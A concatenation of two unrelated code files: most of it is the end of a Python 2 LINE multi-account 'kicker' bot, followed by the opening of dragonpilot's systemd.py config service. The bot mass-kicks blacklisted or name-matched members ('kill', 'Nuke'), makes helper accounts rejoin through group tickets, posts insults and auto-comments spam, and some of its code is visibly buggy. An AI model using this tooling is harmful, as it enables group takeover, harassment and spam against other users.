f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
elif "Unban @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["Ban on","ดำ"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Unban on","ขาว"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text.lower() == 'Banlist':
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to," Nothing in the blacklist")
else:
cl.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "�" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'banlist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += "�" +cl.getContact(mm).displayName + "\n"
cl.sendText(msg.to,cocoa + "Daftar Hitam")
elif msg.text in ["cb","���้างดำ"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
#elif msg.text in ["Whitelist","ขาว"]:
# if msg.from_ in admin:
# wait["wblacklist"] = True
# cl.sendText(msg.to,"send contact to ban")
# elif msg.text in ["Blacklist","ดำ"]:
# if msg.from_ in admin:
# wait["dblacklist"] = True
# cl.sendText(msg.to,"send contact to ban")
# elif msg.text in ["Banlist","เชคดำ"]:
# if msg.from_ in admin:
# if wait["blacklist"] == {}:
# cl.sendText(msg.to,"Nothing double thumbs up")
# else:
# cl.sendText(msg.to,"Daftar Banlist")
# mc = "[⎈]Blacklist [⎈]\n"
# for mi_d in wait["blacklist"]:
# mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
# cl.sendText(msg.to, mc + "")
elif msg.text in ["Ban cek","Cekban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text.lower() == 'kill':
if msg.from_ in admin:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif "Nuke" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Nuke","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
cl.sendText(msg.to,"Masih Mauko Sundala")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Tidak ada Member")
ki2.sendText(msg.to,"Nothing Bosqu")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg,to,"Hahaha")
ki2.sendText(msg,to,"Fakyu Sundala")
#-----------------------------------------------
#-----------------------------------------------
elif "Kicker" in msg.text:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
ki2.acceptGroupInvitationByTicket(msg.to,Ti)
ki3.acceptGroupInvitationByTicket(msg.to,Ti)
ki4.acceptGroupInvitationByTicket(msg.to,Ti)
ki5.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#-----------------------------------------------
elif msg.text in ["Sayang","Kuy","All join","Minna"]:
if msg.from_ in admsa:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
elif msg.text.lower() == 'spcome':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "As1 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "As2 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "As3 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "As4 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
#-----------------------------------------------
elif "As5 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
#-----------------------------------------------
elif msg.text in ["คิกออก","Bye","กุเกลียดมึง","Sayonara"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"ไปก็ได้ บ๊ายบาย " + str(ginfo.name) + "")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As1 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As2 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As3 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As4 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As5 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Welcome","wc on","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
wait["wc"] = True
cl.sendText(msg.to,"ยินดีต้อนรับสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif msg.text in ["Welcome","wc off","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
wait["wc"] = False
cl.sendText(msg.to,"ยินดีต้อนรับสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#-----------------------------------------------
#-----------------------------------------------
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
elif op.param3 in kimid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
except:
pass
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
# pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
# random.choice(KAK).kickoutFromGroup(op.param1,[op.param2])
except:
pass
elif op.param2 not in admin + Bots:
random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
else:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Open QR Kick start------#
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------Open QR Kick finish-----#
#------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n|| " + Nama
wait2['ROM'][op.param1][op.param2] = "|| " + Nama
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def autolike():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait['likeOn'] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print "Like"
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
print "Like"
except:
pass
else:
print "Already Liked Om"
time.sleep(0.60)
def likeme():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Om"
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
systemd.py
|
#!/usr/bin/env python3
# The MIT License
#
# Copyright (c) 2019-, Rick Lan, dragonpilot community, and a number of other of contributors.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
This is a service that broadcast dp config values to openpilot's messaging queues
'''
import cereal.messaging as messaging
from common.dp_conf import confs, get_struct_name, to_struct_val
from common.params import Params, put_nonblocking
import os
from selfdrive.hardware import HARDWARE
params = Params()
from common.dp_common import param_get, get_last_modified
from common.dp_time import LAST_MODIFIED_SYSTEMD
from selfdrive.dragonpilot.dashcamd import Dashcamd
from selfdrive.hardware import EON
import socket
from common.realtime import Ratekeeper
import threading
from selfdrive.dragonpilot.gpx_uploader import gpx_uploader_thread
PARAM_PATH = params.get_params_path() + '/d/'
HERTZ = 1
last_modified_confs = {}
def confd_thread():
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['dragonConf'])
last_dp_msg = None
frame = 0
update_params = False
modified = None
last_modified = None
last_modified_check = None
started = False
free_space = 1
last_started = False
dashcamd = Dashcamd()
is_eon = EON
